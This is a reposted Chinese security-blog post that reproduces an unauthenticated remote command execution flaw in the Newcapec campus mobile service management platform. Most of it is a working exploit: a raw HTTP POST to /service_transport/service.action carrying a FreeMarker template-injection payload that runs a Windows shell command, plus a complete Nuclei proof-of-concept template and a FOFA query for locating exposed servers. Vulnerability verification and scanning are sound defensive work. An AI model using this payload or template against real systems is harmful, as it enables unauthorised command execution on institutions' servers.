「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

admin 2023年11月28日15:12:51评论56 views字数 1842阅读6分8秒阅读模式

免责声明


「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行


此内容仅供技术交流与学习,请勿用于未经授权的场景。请遵循相关法律与道德规范。任何因使用本文所述技术而引发的法律责任,与本文作者及发布平台无关。如有内容争议或侵权,请及时联系我们。谢谢!

「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

漏洞概述

「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

        

    新开普掌上校园服务管理平台service.action接口处存在远程命令执行漏洞,攻击者可在未经身份认证的情况下,调用后台接口,执行恶意系统命令。

「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

漏洞复现

「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

POST /service_transport/service.action HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Connection: closeContent-Length: 211Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4Upgrade-Insecure-Requests: 1
{ "command": "GetFZinfo", "UnitCode": "<#assign ex = "freemarker.template.utility.Execute" ?new()>${ex("cmd /c echo 123 >./webapps/ROOT/test.txt")}"}


「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

NUCLEI POC

「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

id: newcapec-CampusMobileServiceManagementPlatform-RCEinfo:  name: 新开普掌上校园服务管理平台service.action远程命令执行漏洞  author: fgz  severity: high  description: '新开普掌上校园服务管理平台/service_transport/service.action接口处存在远程命令执行漏洞,攻击者可在未经身份认证的情况下,调用后台接口,执行恶意系统命令。'  tags: 2023,xinkaipu,rce  metadata:    max-request: 3    fofa-query: title="掌上校园服务管理平台"    verified: true
http: - raw: - | POST /service_transport/service.action HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 { "command": "GetFZinfo", "UnitCode": "<#assign ex = "freemarker.template.utility.Execute" ?new()>${ex("cmd /c echo {{randstr}} >./webapps/ROOT/{{randstr}}.txt")}" }
- | GET /{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "status_code_2 == 200 && contains(body_2, '{{randstr}}')"

「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

原文始发于微信公众号(知黑守白):「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月28日15:12:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   「漏洞复现」新开普掌上校园服务管理平台service.action远程命令执行http://cn-sec.com/archives/2247856.html

发表评论

匿名网友 填写信息